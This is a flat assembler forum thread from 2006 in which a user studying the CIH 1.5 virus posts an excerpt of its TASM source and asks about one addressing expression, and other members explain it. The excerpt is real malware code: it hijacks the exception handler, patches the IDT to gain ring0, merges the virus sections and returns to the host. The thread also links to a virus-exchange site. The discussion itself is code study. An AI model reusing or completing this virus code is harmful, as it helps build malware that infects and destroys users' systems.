flat assembler
Message board for the users of flat assembler.

Index > Heap > Tasm syntax confusion -- help needed

Author
Thread Post new topic Reply to topic
Pinczakko



Joined: 02 May 2004
Posts: 34
Location: Takabonerate National Park, Indonesia
Pinczakko
The CIH version 1.5 that I'm currently studying uses some confusing Tasm syntax. It's shown below:
Code:
...
; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error  *
; * Occurrence, Especially in NT.     *
; *************************************
 
                        lea     eax, [esp-04h*2]
                        xor     ebx, ebx
                        xchg    eax, fs:[ebx]
                        call    @0
@0:
                        pop     ebx
                        lea     ecx, StopToRunVirusCode-@0[ebx]; <-- what this means?
                        push    ecx
                        push    eax
 
; *************************************
; * Let's Modify                      *
; * IDT(Interrupt Descriptor Table)   *
; * to Get Ring0 Privilege...         *
; *************************************
 
                        push    eax             ;
                        sidt    [esp-02h]       ; Get IDT Base Address
                        pop     ebx             ;
                        add     ebx, HookExceptionNumber*08h+04h ; ZF = 0
                        cli
                        mov     ebp, [ebx]      ; Get Exception Base
                        mov     bp, [ebx-04h]   ; Entry Point
                        lea     esi, MyExceptionHook-@1[ecx] ; <-- what this means?
                        push    esi
                        mov     [ebx-04h], si           ;
                        shr     esi, 16                 ; Modify Exception
                        mov     [ebx+02h], si           ; Entry Point Address
                        pop     esi
 
; *************************************
; * Generate Exception to Get Ring0   *
; *************************************
 
                        int     HookExceptionNumber     ; GenerateException
ReturnAddressOfEndException     =       $
 
; *************************************
; * Merge All Virus Code Section      *
; *************************************
 
                        push    esi
                        mov     esi, eax
 
LoopOfMergeAllVirusCodeSection:
 
                        mov     ecx, [eax-04h]
                        rep     movsb
                        sub     eax, 08h
                        mov     esi, [eax]
                        or      esi, esi
                        jz      QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
                        jmp     LoopOfMergeAllVirusCodeSection
 
QuitLoopOfMergeAllVirusCodeSection:
 
                        pop     esi
 
; *************************************
; * Generate Exception Again          *
; *************************************
 
                        int     HookExceptionNumber     ; GenerateException Again
 
; *************************************
; * Let's Restore                     *
; * Structured Exception Handing      *
; *************************************
 
ReadyRestoreSE:
                        sti
                        xor     ebx, ebx
                        jmp     RestoreSE
 
; *************************************
; * When Exception Error Occurs,      *
; * Our OS System should be in NT.    *
; * So My Cute Virus will not         *
; * Continue to Run, it Jmups to      *
; * Original Application to Run.      *
; *************************************
 
StopToRunVirusCode:
@1                      =       StopToRunVirusCode
 
                        xor     ebx, ebx
                        mov     eax, fs:[ebx]
                        mov     esp, [eax]
 
RestoreSE:
                        pop     dword ptr fs:[ebx]
                        pop     eax
 
; *************************************
; * Return Original App to Execute    *
; *************************************
 
                        pop     ebp
                        push    00401000h       ; Push Original
OriginalAddressOfEntryPoint     =       $-4     ; App Entry Point to Stack
                         ret     ; Return to Original App Entry Point
...
    


The lines that I highlighted with "what this means" are the confusing parts.
What :
Code:
...
@0:
                        pop     ebx
                        lea     ecx, StopToRunVirusCode-@0[ebx]
...
StopToRunVirusCode:
...
    

means?

Does it calculate the RVA of StopToRunVirusCode? or does it calculate the
relative address/distance of StopToRunVirusCode from @0 label?
and what the ebx register used for?

is
Code:
StopToRunVirusCode-@0[ebx]
    

means:
Code:
StopToRunVirusCode - @0 + value_in_memory_pointed_to_by_ebx
    

?

I've never used Tasm in Win32 asm programming. Sorry, if this kind of question is n00b level Wink .

Anyway, the full source code is at: http://vx.netlux.org/src_view.php?file=cih15.zip

Maybe, viewing the overall code will help to understand the code.

TIA,
Pinczakko

-----------
PS: I'm not trying to revive/recode this virus. Just trying to figure out how its code works. It won't attack Win NT/2K/XP systems either. It has no support for it other than exiting the virus execution upon encountering those systems Wink.

_________________
Human knowledge belongs to the world
Post 20 Oct 2006, 07:08
View user's profile Send private message Visit poster's website Yahoo Messenger Reply with quote
MazeGen



Joined: 06 Oct 2003
Posts: 975
Location: Czechoslovakia
MazeGen
Hi Pinczakko,
Pinczakko wrote:

Code:
StopToRunVirusCode-@0[ebx]
    

means:
Code:
StopToRunVirusCode - @0 + value_in_memory_pointed_to_by_ebx
    


Don't forget the operand is used within LEA instruction:
Code:
...
@0:
                        pop     ebx
                        lea     ecx, StopToRunVirusCode-@0[ebx]
...
StopToRunVirusCode:
... 
    

so it means:
Code:
StopToRunVirusCode - @0 + ebx
    

And that is run-time address of StopToRunVirusCode label.
Post 20 Oct 2006, 09:14
View user's profile Send private message Visit poster's website Reply with quote
vid
Verbosity in development


Joined: 05 Sep 2003
Posts: 7105
Location: Slovakia
vid
hehe, that - is pretty confusing then, because it suggests that "@0[ebx] " is subtracted, while @0 is subtracted and ebx is added

... love MASM syntax
Post 20 Oct 2006, 11:51
View user's profile Send private message Visit poster's website AIM Address MSN Messenger ICQ Number Reply with quote
Pinczakko



Joined: 02 May 2004
Posts: 34
Location: Takabonerate National Park, Indonesia
Pinczakko
Thx guys. Really helpful for me Very Happy

_________________
Human knowledge belongs to the world
Post 21 Oct 2006, 05:30
View user's profile Send private message Visit poster's website Yahoo Messenger Reply with quote
Display posts from previous:
Post new topic Reply to topic

Jump to:  


< Last Thread | Next Thread >
Forum Rules:
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Copyright © 1999-2020, Tomasz Grysztar. Also on YouTube, Twitter.

Website powered by rwasa.